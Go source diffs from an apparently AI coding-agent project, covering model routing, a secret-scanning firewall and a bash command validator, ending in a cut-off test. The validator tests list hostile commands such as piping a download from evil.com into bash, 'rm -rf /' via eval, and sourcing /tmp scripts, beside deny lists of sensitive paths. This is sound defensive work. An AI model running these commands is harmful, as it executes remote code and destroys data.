// so tagged names like "Qwen2.5-Coder:7b" are still recognized.
func inferToolSupport(modelName string) bool {
	normalized := strings.ToLower(modelName)
	for _, family := range toolSupportedModelPrefixes {
		if strings.Contains(normalized, family) {
			return true
		}
	}
	return false
}
// DiscoverOllama polls the local Ollama instance for available models.
@@ -62,10 +90,12 @@ func DiscoverOllama(ctx context.Context, baseURL string) ([]DiscoveredModel, err
var models []DiscoveredModel
for _, m := range result.Models {
models = append(models, DiscoveredModel{
ID: m.Name,
Name: m.Name,
Provider: "ollama",
Size: m.Size,
ID: m.Name,
Name: m.Name,
Provider: "ollama",
Size: m.Size,
SupportsTools: inferToolSupport(m.Name),
ContextSize: 32768, // conservative default; Ollama /api/show can refine this
})
}
return models, nil
@@ -107,9 +137,11 @@ func DiscoverLlamaCpp(ctx context.Context, baseURL string) ([]DiscoveredModel, e
var models []DiscoveredModel
for _, m := range result.Data {
models = append(models, DiscoveredModel{
ID: m.ID,
Name: m.ID,
Provider: "llamacpp",
ID: m.ID,
Name: m.ID,
Provider: "llamacpp",
SupportsTools: inferToolSupport(m.ID),
ContextSize: 8192, // llama.cpp default; --ctx-size configurable
})
}
return models, nil
@@ -208,8 +240,14 @@ func RegisterDiscoveredModels(r *Router, models []DiscoveredModel, providerFacto
ModelName: m.ID,
IsLocal: true,
Capabilities: provider.Capabilities{
ToolUse: true, // assume tool support, will fail gracefully if not
ContextWindow: 32768,
// Conservative default: don't assume tool support.
// Many small local models (phi, tinyllama, etc.) don't support
// function calling and will produce confused output if selected
// for tool-requiring tasks. Larger known models (mistral, llama3,
// qwen2.5-coder) support tools. Callers can update the arm's
// Capabilities after probing the model template.
ToolUse: m.SupportsTools,
ContextWindow: m.ContextSize,
},
})
}

View File

@@ -94,13 +94,27 @@ func (r *Router) Select(task Task) RoutingDecision {
return RoutingDecision{Error: fmt.Errorf("selection failed")}
}
// Reserve capacity on all pools so concurrent selects don't overcommit.
// If a reservation fails (race between CanAfford and Reserve), return an error.
var reservations []*Reservation
for _, pool := range best.Pools {
res, ok := pool.Reserve(best.ID, task.EstimatedTokens)
if !ok {
for _, prev := range reservations {
prev.Rollback()
}
return RoutingDecision{Error: fmt.Errorf("pool capacity exhausted for arm %s", best.ID)}
}
reservations = append(reservations, res)
}
r.logger.Debug("arm selected",
"arm", best.ID,
"task_type", task.Type,
"complexity", task.ComplexityScore,
)
return RoutingDecision{Strategy: StrategySingleArm, Arm: best}
return RoutingDecision{Strategy: StrategySingleArm, Arm: best, reservations: reservations}
}
// SetLocalOnly constrains routing to local arms only (for incognito mode).
@@ -190,19 +204,21 @@ func (r *Router) RegisterProvider(ctx context.Context, prov provider.Provider, i
}
}
// Stream is a convenience that selects an arm and streams from it.
func (r *Router) Stream(ctx context.Context, task Task, req provider.Request) (stream.Stream, *Arm, error) {
// Stream selects an arm and streams from it, returning the RoutingDecision so the
// caller can commit or rollback pool reservations when the request completes.
// Call decision.Commit(actualTokens) on success, decision.Rollback() on failure.
func (r *Router) Stream(ctx context.Context, task Task, req provider.Request) (stream.Stream, RoutingDecision, error) {
decision := r.Select(task)
if decision.Error != nil {
return nil, nil, decision.Error
return nil, decision, decision.Error
}
arm := decision.Arm
req.Model = arm.ModelName
req.Model = decision.Arm.ModelName
s, err := arm.Provider.Stream(ctx, req)
s, err := decision.Arm.Provider.Stream(ctx, req)
if err != nil {
return nil, arm, err
decision.Rollback()
return nil, decision, err
}
return s, arm, nil
return s, decision, nil
}

View File

@@ -303,3 +303,199 @@ func TestRouter_SelectForcedNotFound(t *testing.T) {
t.Error("should error when forced arm not found")
}
}
// --- Gap A: Pool Reservations ---
func TestRoutingDecision_CommitReleasesReservation(t *testing.T) {
	limitPool := &LimitPool{
		TotalLimit: 1000,
		ArmRates:   map[ArmID]float64{"a/model": 1.0},
		ScarcityK:  2,
	}
	rt := New(Config{})
	rt.RegisterArm(&Arm{
		ID:           "a/model",
		Capabilities: provider.Capabilities{ToolUse: true},
		Pools:        []*LimitPool{limitPool},
	})

	decision := rt.Select(Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 500, Priority: PriorityNormal})
	if decision.Error != nil {
		t.Fatalf("Select: %v", decision.Error)
	}
	// After Select: tokens should be reserved
	if limitPool.Reserved == 0 {
		t.Error("Select should reserve pool capacity")
	}

	// After Commit: reserved released, used incremented
	decision.Commit(400)
	if limitPool.Reserved != 0 {
		t.Errorf("Reserved = %f after Commit, want 0", limitPool.Reserved)
	}
	if limitPool.Used == 0 {
		t.Error("Used should be non-zero after Commit")
	}
}
func TestRoutingDecision_RollbackReleasesReservation(t *testing.T) {
	limitPool := &LimitPool{
		TotalLimit: 1000,
		ArmRates:   map[ArmID]float64{"a/model": 1.0},
		ScarcityK:  2,
	}
	rt := New(Config{})
	rt.RegisterArm(&Arm{
		ID:           "a/model",
		Capabilities: provider.Capabilities{ToolUse: true},
		Pools:        []*LimitPool{limitPool},
	})

	decision := rt.Select(Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 500, Priority: PriorityNormal})
	if decision.Error != nil {
		t.Fatalf("Select: %v", decision.Error)
	}

	// Rollback must release the reservation without charging usage.
	decision.Rollback()
	if limitPool.Reserved != 0 {
		t.Errorf("Reserved = %f after Rollback, want 0", limitPool.Reserved)
	}
	if limitPool.Used != 0 {
		t.Errorf("Used = %f after Rollback, want 0", limitPool.Used)
	}
}
func TestSelect_ConcurrentReservationPreventsOvercommit(t *testing.T) {
	// Pool with very limited capacity: only 1 request can fit
	tinyPool := &LimitPool{
		TotalLimit: 10,
		ArmRates:   map[ArmID]float64{"a/model": 1.0},
		ScarcityK:  2,
	}
	rt := New(Config{})
	rt.RegisterArm(&Arm{
		ID:           "a/model",
		Capabilities: provider.Capabilities{ToolUse: true},
		Pools:        []*LimitPool{tinyPool},
	})
	bigTask := Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 8000, Priority: PriorityNormal}

	// First select should succeed and reserve
	d1 := rt.Select(bigTask)
	// Second concurrent select should fail — capacity reserved by first
	d2 := rt.Select(bigTask)
	if d1.Error != nil && d2.Error != nil {
		t.Error("at least one selection should succeed")
	}
	if d1.Error == nil && d2.Error == nil {
		t.Error("second selection should fail: pool overcommit prevented")
	}

	// Cleanup
	d1.Rollback()
	d2.Rollback()
}
// --- Gap B: ArmPerf ---
func TestArmPerf_Update_FirstSample(t *testing.T) {
	// The very first observation seeds the EMA directly.
	var perf ArmPerf
	perf.Update(50*time.Millisecond, 100, 2*time.Second)

	if perf.Samples != 1 {
		t.Errorf("Samples = %d, want 1", perf.Samples)
	}
	if perf.TTFTMs != 50 {
		t.Errorf("TTFTMs = %f, want 50", perf.TTFTMs)
	}
	if perf.ToksPerSec != 50 { // 100 tokens / 2s
		t.Errorf("ToksPerSec = %f, want 50", perf.ToksPerSec)
	}
}
func TestArmPerf_Update_EMA(t *testing.T) {
	var perf ArmPerf
	perf.Update(100*time.Millisecond, 100, time.Second)
	perf.Update(50*time.Millisecond, 100, time.Second) // faster second response

	if perf.Samples != 2 {
		t.Errorf("Samples = %d, want 2", perf.Samples)
	}
	// EMA: new = 0.3*50 + 0.7*100 = 85
	if perf.TTFTMs < 80 || perf.TTFTMs > 90 {
		t.Errorf("TTFTMs = %f, want ~85 (EMA of 100→50)", perf.TTFTMs)
	}
}
func TestArmPerf_Update_ZeroDuration(t *testing.T) {
	// A zero stream duration makes throughput undefined; it must report 0
	// rather than a division-by-zero artifact.
	var perf ArmPerf
	perf.Update(10*time.Millisecond, 100, 0)
	if perf.Samples != 1 {
		t.Errorf("Samples = %d, want 1", perf.Samples)
	}
	if perf.ToksPerSec != 0 {
		t.Errorf("ToksPerSec = %f, want 0 for zero duration", perf.ToksPerSec)
	}
}
// --- Gap C: QualityThreshold ---
func TestFilterFeasible_RejectsLowQualityArm(t *testing.T) {
	// security_review carries the highest quality floor; a bare arm scores
	// ~0.5 and must be filtered out while a more capable arm survives.
	weak := &Arm{
		ID:           "a/basic",
		Capabilities: provider.Capabilities{ToolUse: true, ContextWindow: 4096},
	}
	strong := &Arm{
		ID: "b/powerful",
		Capabilities: provider.Capabilities{
			ToolUse:       true,
			Thinking:      true, // thinking boosts score for security review
			ContextWindow: 200000,
		},
	}
	feasible := filterFeasible([]*Arm{weak, strong}, Task{
		Type:          TaskSecurityReview,
		RequiresTools: true,
		Priority:      PriorityHigh,
	})
	if len(feasible) != 1 {
		t.Fatalf("len(feasible) = %d, want 1", len(feasible))
	}
	if feasible[0].ID != "b/powerful" {
		t.Errorf("feasible[0] = %s, want b/powerful", feasible[0].ID)
	}
}
func TestFilterFeasible_FallsBackWhenAllBelowQuality(t *testing.T) {
	// When every candidate is under the quality floor, the filter degrades
	// gracefully and still returns something rather than nothing.
	arm := &Arm{
		ID:           "a/only",
		Capabilities: provider.Capabilities{ToolUse: true, ContextWindow: 4096},
	}
	got := filterFeasible([]*Arm{arm}, Task{Type: TaskSecurityReview, RequiresTools: true})
	if len(got) == 0 {
		t.Error("should fall back to low-quality arm when no better option exists")
	}
}

View File

@@ -14,9 +14,26 @@ const (
// RoutingDecision is the result of arm selection.
type RoutingDecision struct {
Strategy Strategy
Arm *Arm // primary arm
Error error
Strategy Strategy
Arm *Arm // primary arm
Error error
reservations []*Reservation // pool reservations held until commit/rollback
}
// Commit finalizes the routing decision, recording actual token consumption.
// Must be called when the request completes successfully.
func (d RoutingDecision) Commit(actualTokens int) {
	for i := range d.reservations {
		d.reservations[i].Commit(actualTokens)
	}
}
// Rollback releases the routing decision's pool reservations without recording usage.
// Must be called when the request fails before any tokens are consumed.
func (d RoutingDecision) Rollback() {
	for i := range d.reservations {
		d.reservations[i].Rollback()
	}
}
// selectBest picks the highest-scoring feasible arm using heuristic scoring.
@@ -121,9 +138,15 @@ func effectiveCost(arm *Arm, task Task) float64 {
return base * maxMultiplier
}
// filterFeasible returns arms that can handle the task (tools, pool capacity).
// filterFeasible returns arms that can handle the task (tools, pool capacity, quality).
// Arms that pass tool and pool checks but fall below the task's minimum quality threshold
// are collected separately and used as a last resort if no arm meets the threshold.
func filterFeasible(arms []*Arm, task Task) []*Arm {
threshold := DefaultThresholds[task.Type]
var feasible []*Arm
var belowQuality []*Arm // passed tool+pool but scored below minimum quality
for _, arm := range arms {
// Must support tools if task requires them
if task.RequiresTools && !arm.SupportsTools() {
@@ -143,13 +166,26 @@ func filterFeasible(arms []*Arm, task Task) []*Arm {
continue
}
// Quality floor: arms below minimum are set aside, not discarded
if heuristicQuality(arm, task) < threshold.Minimum {
belowQuality = append(belowQuality, arm)
continue
}
feasible = append(feasible, arm)
}
// If no arm with tools is feasible but task requires them,
// fall back to any available arm (tool-less is better than nothing)
// Degrade gracefully: if no arm meets quality threshold, use below-quality ones
if len(feasible) == 0 && len(belowQuality) > 0 {
return belowQuality
}
// If still empty and task requires tools, relax pool checks (last resort)
if len(feasible) == 0 && task.RequiresTools {
for _, arm := range arms {
if !arm.Capabilities.ToolUse {
continue
}
poolsOK := true
for _, pool := range arm.Pools {
if !pool.CanAfford(arm.ID, task.EstimatedTokens) {

View File

@@ -99,17 +99,19 @@ type QualityThreshold struct {
Target float64 // ideal
}
// DefaultThresholds are calibrated for M4 heuristic scores (range ~0–0.85).
// M9 will replace these with bandit-derived values once quality data accumulates.
var DefaultThresholds = map[TaskType]QualityThreshold{
TaskBoilerplate: {0.50, 0.70, 0.80},
TaskGeneration: {0.60, 0.75, 0.88},
TaskRefactor: {0.65, 0.78, 0.90},
TaskReview: {0.70, 0.82, 0.92},
TaskUnitTest: {0.60, 0.75, 0.85},
TaskPlanning: {0.75, 0.88, 0.95},
TaskOrchestration: {0.80, 0.90, 0.96},
TaskSecurityReview: {0.88, 0.94, 0.99},
TaskDebug: {0.65, 0.80, 0.90},
TaskExplain: {0.55, 0.72, 0.85},
TaskBoilerplate: {0.40, 0.55, 0.70}, // any capable arm works
TaskGeneration: {0.45, 0.60, 0.75},
TaskRefactor: {0.50, 0.65, 0.78},
TaskReview: {0.55, 0.68, 0.80},
TaskUnitTest: {0.45, 0.60, 0.75},
TaskPlanning: {0.60, 0.72, 0.82},
TaskOrchestration: {0.65, 0.75, 0.83},
TaskSecurityReview: {0.70, 0.78, 0.84}, // requires thinking or large context window
TaskDebug: {0.50, 0.65, 0.78},
TaskExplain: {0.40, 0.55, 0.72},
}
// ClassifyTask infers a TaskType from the user's prompt using keyword heuristics.

View File

@@ -1,6 +1,7 @@
package security
import (
"encoding/json"
"log/slog"
"somegit.dev/Owlibou/gnoma/internal/message"
@@ -96,8 +97,18 @@ func (f *Firewall) scanMessage(m message.Message) message.Message {
} else {
cleaned.Content[i] = c
}
case message.ContentToolCall:
// Scan LLM-generated tool arguments for accidentally embedded secrets
if c.ToolCall != nil {
tc := *c.ToolCall
scanned := f.scanAndRedact(string(tc.Arguments), "tool_call_args")
tc.Arguments = json.RawMessage(scanned)
cleaned.Content[i] = message.NewToolCallContent(tc)
} else {
cleaned.Content[i] = c
}
default:
// Tool calls, thinking blocks — pass through
// Thinking blocks — pass through
cleaned.Content[i] = c
}
}
@@ -115,11 +126,20 @@ func (f *Firewall) scanAndRedact(content, source string) string {
}
for _, m := range matches {
f.logger.Warn("secret detected",
"pattern", m.Pattern,
"action", m.Action,
"source", source,
)
switch m.Action {
case ActionBlock:
f.logger.Error("blocked: secret detected",
"pattern", m.Pattern,
"source", source,
)
return "[BLOCKED: content contained " + m.Pattern + "]"
default:
f.logger.Debug("secret redacted",
"pattern", m.Pattern,
"action", m.Action,
"source", source,
)
}
}
return Redact(content, matches)

View File

@@ -1,9 +1,9 @@
package security
import (
"fmt"
"math"
"regexp"
"strings"
)
// ScanAction determines what to do when a secret is found.
@@ -68,7 +68,7 @@ func (s *Scanner) Scan(content string) []SecretMatch {
for _, p := range s.patterns {
locs := p.Regex.FindAllStringIndex(content, -1)
for _, loc := range locs {
key := strings.Join([]string{p.Name, string(rune(loc[0])), string(rune(loc[1]))}, ":")
key := fmt.Sprintf("%s:%d:%d", p.Name, loc[0], loc[1])
if seen[key] {
continue
}
@@ -232,7 +232,7 @@ func defaultPatterns() []SecretPattern {
// --- Generic ---
{"generic_secret_assign", `(?i)(?:password|secret|token|api_key|apikey|auth)\s*[:=]\s*['"][a-zA-Z0-9_/+=\-]{8,}['"]`},
{"env_secret", `(?i)^[A-Z_]{2,}(?:_KEY|_SECRET|_TOKEN|_PASSWORD)\s*=\s*.{8,}$`},
{"env_secret", `(?im)^[A-Z_]{2,}(?:_KEY|_SECRET|_TOKEN|_PASSWORD)\s*=\s*.{8,}$`},
}
var result []SecretPattern

View File

@@ -375,3 +375,48 @@ func TestFirewall_UnicodeCleanedBeforeSecretScan(t *testing.T) {
t.Error("unicode tags should be stripped")
}
}
func TestFirewall_ActionBlockReturnsBlockedString(t *testing.T) {
	// An ActionBlock pattern must replace the message with a [BLOCKED: ...]
	// marker rather than letting the matched secret pass through.
	fw := NewFirewall(FirewallConfig{
		ScanOutgoing:     true,
		EntropyThreshold: 3.0,
	})
	if err := fw.Scanner().AddPattern("test_block", `BLOCK_THIS_SECRET`, ActionBlock); err != nil {
		t.Fatalf("AddPattern: %v", err)
	}
	out := fw.ScanOutgoingMessages([]message.Message{
		message.NewUserText("some text BLOCK_THIS_SECRET more text"),
	})
	got := out[0].TextContent()
	if strings.Contains(got, "BLOCK_THIS_SECRET") {
		t.Error("ActionBlock content should not pass through")
	}
	if !strings.Contains(got, "[BLOCKED:") {
		t.Errorf("expected [BLOCKED: ...] marker, got %q", got)
	}
}
func TestScanner_DedupKeyNoCollision(t *testing.T) {
	// Regression: a dedup key built from string(rune(offset)) collides for
	// byte offsets > 127; both matches must survive deduplication.
	s := NewScanner(3.0)
	pad := strings.Repeat("x", 128) // push matches past offset 127
	input := pad + "sk-ant-api03-aaaaaaaabbbbbbbbcccccccc " + pad + "sk-ant-api03-ddddddddeeeeeeeeffffffff"
	var got int
	for _, m := range s.Scan(input) {
		if m.Pattern == "anthropic_api_key" {
			got++
		}
	}
	if got < 2 {
		t.Errorf("expected 2 distinct Anthropic key matches after offset 127, got %d (dedup key collision?)", got)
	}
}

View File

@@ -39,6 +39,11 @@ func NewLocal(eng *engine.Engine, providerName, model string) *Local {
}
func (s *Local) Send(input string) error {
return s.SendWithOptions(input, engine.TurnOptions{})
}
// SendWithOptions is like Send but applies per-turn engine options.
func (s *Local) SendWithOptions(input string, opts engine.TurnOptions) error {
s.mu.Lock()
if s.state != StateIdle {
s.mu.Unlock()
@@ -64,7 +69,7 @@ func (s *Local) Send(input string) error {
}
}
turn, err := s.eng.Submit(ctx, input, cb)
turn, err := s.eng.SubmitWithOptions(ctx, input, opts, cb)
s.mu.Lock()
s.turn = turn

View File

@@ -53,6 +53,8 @@ type Status struct {
type Session interface {
// Send submits user input and begins an agentic turn.
Send(input string) error
// SendWithOptions is like Send but applies per-turn engine options.
SendWithOptions(input string, opts engine.TurnOptions) error
// Events returns the channel that receives streaming events.
// A new channel is created per Send(). Closed when the turn completes.
Events() <-chan stream.Event

View File

@@ -27,7 +27,7 @@ var paramSchema = json.RawMessage(`{
},
"max_turns": {
"type": "integer",
"description": "Maximum tool-calling rounds for the elf (default 30)"
"description": "Maximum tool-calling rounds for the elf (0 or omit = unlimited)"
}
},
"required": ["prompt"]
@@ -51,9 +51,8 @@ func (t *Tool) SetProgressCh(ch chan<- elf.Progress) {
func (t *Tool) Name() string { return "agent" }
func (t *Tool) Description() string { return "Spawn a sub-agent (elf) to handle a task independently. The elf gets its own conversation and tools. IMPORTANT: To spawn multiple elfs in parallel, call this tool multiple times in the SAME response — do not wait for one to finish before spawning the next." }
func (t *Tool) Parameters() json.RawMessage { return paramSchema }
func (t *Tool) IsReadOnly() bool { return true }
func (t *Tool) IsDestructive() bool { return false }
func (t *Tool) ShouldDefer() bool { return true }
func (t *Tool) IsReadOnly() bool { return true }
func (t *Tool) IsDestructive() bool { return false }
type agentArgs struct {
Prompt string `json:"prompt"`
@@ -70,11 +69,8 @@ func (t *Tool) Execute(ctx context.Context, args json.RawMessage) (tool.Result,
return tool.Result{}, fmt.Errorf("agent: prompt required")
}
taskType := parseTaskType(a.TaskType)
taskType := parseTaskType(a.TaskType, a.Prompt)
maxTurns := a.MaxTurns
if maxTurns <= 0 {
maxTurns = 30 // default
}
// Truncate description for tree display
desc := a.Prompt
@@ -236,7 +232,9 @@ func formatTokens(tokens int) string {
return fmt.Sprintf("%d tokens", tokens)
}
func parseTaskType(s string) router.TaskType {
// parseTaskType maps explicit task_type hints to router TaskType.
// When no hint is provided (empty string), auto-classifies from the prompt.
func parseTaskType(s string, prompt string) router.TaskType {
switch strings.ToLower(s) {
case "generation":
return router.TaskGeneration
@@ -251,6 +249,6 @@ func parseTaskType(s string) router.TaskType {
case "planning":
return router.TaskPlanning
default:
return router.TaskGeneration
return router.ClassifyTask(prompt).Type
}
}

View File

@@ -0,0 +1,52 @@
package agent
import (
"testing"
"somegit.dev/Owlibou/gnoma/internal/router"
)
func TestParseTaskType_ExplicitHintTakesPrecedence(t *testing.T) {
	// An explicit task_type hint must win over whatever the prompt text
	// would have been classified as.
	cases := []struct {
		hint, prompt string
		want         router.TaskType
	}{
		{"review", "fix the bug", router.TaskReview},
		{"refactor", "write tests", router.TaskRefactor},
		{"debug", "plan the architecture", router.TaskDebug},
		{"explain", "implement the feature", router.TaskExplain},
		{"planning", "debug the crash", router.TaskPlanning},
		{"generation", "review the code", router.TaskGeneration},
	}
	for _, c := range cases {
		if got := parseTaskType(c.hint, c.prompt); got != c.want {
			t.Errorf("parseTaskType(%q, %q) = %s, want %s", c.hint, c.prompt, got, c.want)
		}
	}
}
func TestParseTaskType_AutoClassifiesWhenNoHint(t *testing.T) {
	// With an empty hint the prompt is classified instead of defaulting
	// to TaskGeneration.
	cases := []struct {
		prompt string
		want   router.TaskType
	}{
		{"review this pull request", router.TaskReview},
		{"fix the failing test", router.TaskDebug},
		{"refactor the auth module", router.TaskRefactor},
		{"write unit tests for handler", router.TaskUnitTest},
		{"explain how the router works", router.TaskExplain},
		{"audit security of the API", router.TaskSecurityReview},
		{"plan the migration strategy", router.TaskPlanning},
		{"scaffold a new service", router.TaskBoilerplate},
	}
	for _, c := range cases {
		if got := parseTaskType("", c.prompt); got != c.want {
			t.Errorf("parseTaskType(%q) = %s, want %s (auto-classified)", c.prompt, got, c.want)
		}
	}
}

View File

@@ -39,7 +39,7 @@ var batchSchema = json.RawMessage(`{
},
"max_turns": {
"type": "integer",
"description": "Maximum tool-calling rounds per elf (default 30)"
"description": "Maximum tool-calling rounds per elf (0 or omit = unlimited)"
}
},
"required": ["tasks"]
@@ -62,9 +62,8 @@ func (t *BatchTool) SetProgressCh(ch chan<- elf.Progress) {
func (t *BatchTool) Name() string { return "spawn_elfs" }
func (t *BatchTool) Description() string { return "Spawn multiple elfs (sub-agents) in parallel. Use this when you need to run 2+ independent tasks concurrently. Each elf gets its own conversation and tools. All elfs run simultaneously and results are collected when all complete." }
func (t *BatchTool) Parameters() json.RawMessage { return batchSchema }
func (t *BatchTool) IsReadOnly() bool { return true }
func (t *BatchTool) IsDestructive() bool { return false }
func (t *BatchTool) ShouldDefer() bool { return true }
func (t *BatchTool) IsReadOnly() bool { return true }
func (t *BatchTool) IsDestructive() bool { return false }
type batchArgs struct {
Tasks []batchTask `json:"tasks"`
@@ -89,9 +88,6 @@ func (t *BatchTool) Execute(ctx context.Context, args json.RawMessage) (tool.Res
}
maxTurns := a.MaxTurns
if maxTurns <= 0 {
maxTurns = 30
}
systemPrompt := "You are an elf — a focused sub-agent of gnoma. Complete the given task thoroughly and concisely. Use tools as needed."
@@ -116,7 +112,7 @@ func (t *BatchTool) Execute(ctx context.Context, args json.RawMessage) (tool.Res
}
}
taskType := parseTaskType(task.TaskType)
taskType := parseTaskType(task.TaskType, task.Prompt)
e, err := t.manager.Spawn(ctx, taskType, task.Prompt, systemPrompt, maxTurns)
if err != nil {
for _, entry := range elfs {

View File

@@ -5,6 +5,7 @@ import (
"fmt"
"os"
"os/exec"
"sort"
"strings"
"sync"
"time"
@@ -48,6 +49,36 @@ func (m *AliasMap) All() map[string]string {
return cp
}
// AliasSummary returns a compact, LLM-readable summary of command-replacement aliases —
// those where the expansion's first word differs from the alias name (e.g. find → fd).
// Flag-only aliases (ls → ls --color=auto) are excluded. Returns "" if none found.
func (m *AliasMap) AliasSummary() string {
	if m == nil {
		return ""
	}
	m.mu.RLock()
	defer m.mu.RUnlock()
	var pairs []string
	for name, expansion := range m.aliases {
		// The replacement command is the expansion's first word.
		target := expansion
		if i := strings.IndexAny(expansion, " \t"); i >= 0 {
			target = expansion[:i]
		}
		if target == "" || target == name {
			continue // flag-only alias (same base command) or empty expansion
		}
		pairs = append(pairs, name+" → "+target)
	}
	if len(pairs) == 0 {
		return ""
	}
	// Sort for deterministic output (map iteration order is random).
	sort.Strings(pairs)
	return "Shell command replacements (use replacement's syntax, not original): " +
		strings.Join(pairs, ", ") + "."
}
// ExpandCommand expands the first word of a command if it's a known alias.
// Only the first word is expanded (matching bash alias behavior).
// Returns the original command unchanged if no alias matches.

View File

@@ -2,6 +2,7 @@ package bash
import (
"context"
"strings"
"testing"
)
@@ -265,6 +266,51 @@ func TestHarvestAliases_Integration(t *testing.T) {
}
}
func TestAliasMap_AliasSummary(t *testing.T) {
	m := NewAliasMap()
	m.mu.Lock()
	m.aliases["find"] = "fd"
	m.aliases["grep"] = "rg --color=auto"
	m.aliases["ls"] = "ls --color=auto" // flag-only, same command — should be excluded
	m.aliases["ll"] = "ls -la"          // replacement to different command — included
	m.mu.Unlock()
	got := m.AliasSummary()
	if got == "" {
		t.Fatal("AliasSummary should return non-empty string")
	}
	for _, want := range []string{"find → fd", "grep → rg", "ll → ls"} {
		if !strings.Contains(got, want) {
			t.Errorf("AliasSummary missing %q, got: %q", want, got)
		}
	}
	// The flag-only alias must not be reported.
	if strings.Contains(got, "ls → ls") {
		t.Errorf("AliasSummary should exclude flag-only aliases (ls → ls), got: %q", got)
	}
}
func TestAliasMap_AliasSummary_Empty(t *testing.T) {
	// An alias that only adds flags to the same base command produces
	// no summary at all.
	m := NewAliasMap()
	m.mu.Lock()
	m.aliases["ls"] = "ls --color=auto"
	m.mu.Unlock()
	if summary := m.AliasSummary(); summary != "" {
		t.Errorf("AliasSummary for same-command aliases should be empty, got %q", summary)
	}
}
func TestAliasMap_AliasSummary_Nil(t *testing.T) {
	// AliasSummary is documented as nil-safe.
	var m *AliasMap
	if summary := m.AliasSummary(); summary != "" {
		t.Errorf("nil AliasMap.AliasSummary() should return empty, got %q", summary)
	}
}
func TestBashTool_WithAliases(t *testing.T) {
aliases := NewAliasMap()
aliases.mu.Lock()

View File

@@ -24,6 +24,7 @@ const (
CheckUnicodeWhitespace // non-ASCII whitespace
CheckZshDangerous // zsh-specific dangerous constructs
CheckCommentDesync // # inside strings hiding commands
CheckIndirectExec // eval, bash -c, curl|bash, source
)
// SecurityViolation describes a failed security check.
@@ -89,6 +90,9 @@ func ValidateCommand(cmd string) *SecurityViolation {
if v := checkCommentQuoteDesync(cmd); v != nil {
return v
}
if v := checkIndirectExec(cmd); v != nil {
return v
}
return nil
}
@@ -247,6 +251,7 @@ func checkStandaloneSemicolon(cmd string) *SecurityViolation {
}
// checkSensitiveRedirection blocks output redirection to sensitive paths.
// Detects: >, >>, fd redirects (2>), and no-space variants (>/etc/passwd).
func checkSensitiveRedirection(cmd string) *SecurityViolation {
sensitiveTargets := []string{
"/etc/passwd", "/etc/shadow", "/etc/sudoers",
@@ -256,7 +261,14 @@ func checkSensitiveRedirection(cmd string) *SecurityViolation {
}
for _, target := range sensitiveTargets {
if strings.Contains(cmd, "> "+target) || strings.Contains(cmd, ">>"+target) {
// Match any form: >, >>, 2>, 2>>, &> followed by optional whitespace then target
idx := strings.Index(cmd, target)
if idx <= 0 {
continue
}
// Check what precedes the target (skip whitespace backwards)
pre := strings.TrimRight(cmd[:idx], " \t")
if len(pre) > 0 && (pre[len(pre)-1] == '>' || strings.HasSuffix(pre, ">>")) {
return &SecurityViolation{
Check: CheckRedirection,
Message: fmt.Sprintf("redirection to sensitive path: %s", target),
@@ -384,14 +396,14 @@ func checkUnicodeWhitespace(cmd string) *SecurityViolation {
}
// checkZshDangerous detects zsh-specific dangerous constructs.
// Note: <() and >() are intentionally excluded — they are also valid bash process
// substitution patterns used in legitimate commands (e.g., diff <(cmd1) <(cmd2)).
func checkZshDangerous(cmd string) *SecurityViolation {
dangerousPatterns := []struct {
pattern string
msg string
}{
{"=(", "zsh process substitution =() (arbitrary execution)"},
{">(", "zsh output process substitution >()"},
{"<(", "zsh input process substitution <()"},
{"=(", "zsh =() process substitution (arbitrary execution)"},
{"zmodload", "zsh module loading (can load arbitrary code)"},
{"sysopen", "zsh sysopen (direct file descriptor access)"},
{"ztcp", "zsh TCP socket access"},
@@ -476,3 +488,51 @@ func checkDangerousVars(cmd string) *SecurityViolation {
}
return nil
}
// checkIndirectExec blocks commands that run arbitrary code indirectly,
// bypassing all other security checks applied to the outer command string.
// These are the highest-risk patterns in an agentic context.
//
// Matching is token-based rather than substring-based so that innocuous
// commands are not blocked ("cat x | sha256sum" contains "| sh",
// "git log --source" contains "source "), while separators written without
// spaces ("foo;eval x", "curl x|bash") are still caught.
func checkIndirectExec(cmd string) *SecurityViolation {
	lower := strings.ToLower(cmd)
	// Newlines separate commands exactly like ';'.
	lower = strings.ReplaceAll(lower, "\n", ";")
	// Pad shell separators so they tokenize as standalone fields even
	// when written without surrounding spaces.
	for _, sep := range []string{"|", ";", "&", "(", ")", "`"} {
		lower = strings.ReplaceAll(lower, sep, " "+sep+" ")
	}
	tokens := strings.Fields(lower)

	isSep := func(s string) bool {
		switch s {
		case "|", ";", "&", "(", ")", "`":
			return true
		}
		return false
	}
	isShell := func(s string) bool { return s == "bash" || s == "sh" || s == "zsh" }
	violation := func(msg string) *SecurityViolation {
		return &SecurityViolation{Check: CheckIndirectExec, Message: msg}
	}

	cmdPos := true // true when the current token sits in command position
	for i, tok := range tokens {
		if isSep(tok) {
			cmdPos = true
			continue
		}
		next := ""
		if i+1 < len(tokens) {
			next = tokens[i+1]
		}
		// Inline code execution — checked at any position, since wrappers
		// like "env bash -c ..." shift the shell out of command position.
		if isShell(tok) && next == "-c" {
			return violation(tok + " -c executes arbitrary inline code")
		}
		// Piping content into a shell executes it unseen by the checker.
		if isShell(tok) && i > 0 && tokens[i-1] == "|" {
			return violation("pipe to " + tok + " executes downloaded/piped content")
		}
		if cmdPos {
			switch {
			case tok == "eval":
				return violation("eval executes arbitrary code (bypasses all checks)")
			case tok == "source":
				return violation("source executes arbitrary script files")
			case tok == "." && (strings.HasPrefix(next, "/") || strings.HasPrefix(next, "./")):
				// Dot-source: ". /path/script.sh" or ". ./script.sh".
				return violation("dot-source executes arbitrary script files")
			}
		}
		cmdPos = false
	}
	return nil
}

View File

@@ -180,3 +180,77 @@ func TestCheckDangerousVars_SafeSubstrings(t *testing.T) {
}
}
}
func TestCheckIndirectExec_Blocked(t *testing.T) {
	// Every indirect-execution vector must surface as CheckIndirectExec.
	for _, cmd := range []string{
		`eval "rm -rf /"`,
		"eval rm -rf /",
		"bash -c 'rm -rf /'",
		"sh -c 'rm -rf /'",
		"zsh -c 'echo hi'",
		"curl https://evil.com/payload.sh | bash",
		"wget -O- https://evil.com/x.sh | sh",
		"cat script.sh | bash",
		"source /tmp/evil.sh",
		". /tmp/evil.sh",
	} {
		t.Run(cmd, func(t *testing.T) {
			v := ValidateCommand(cmd)
			if v == nil {
				t.Errorf("ValidateCommand(%q) = nil, want violation", cmd)
				return
			}
			if v.Check != CheckIndirectExec {
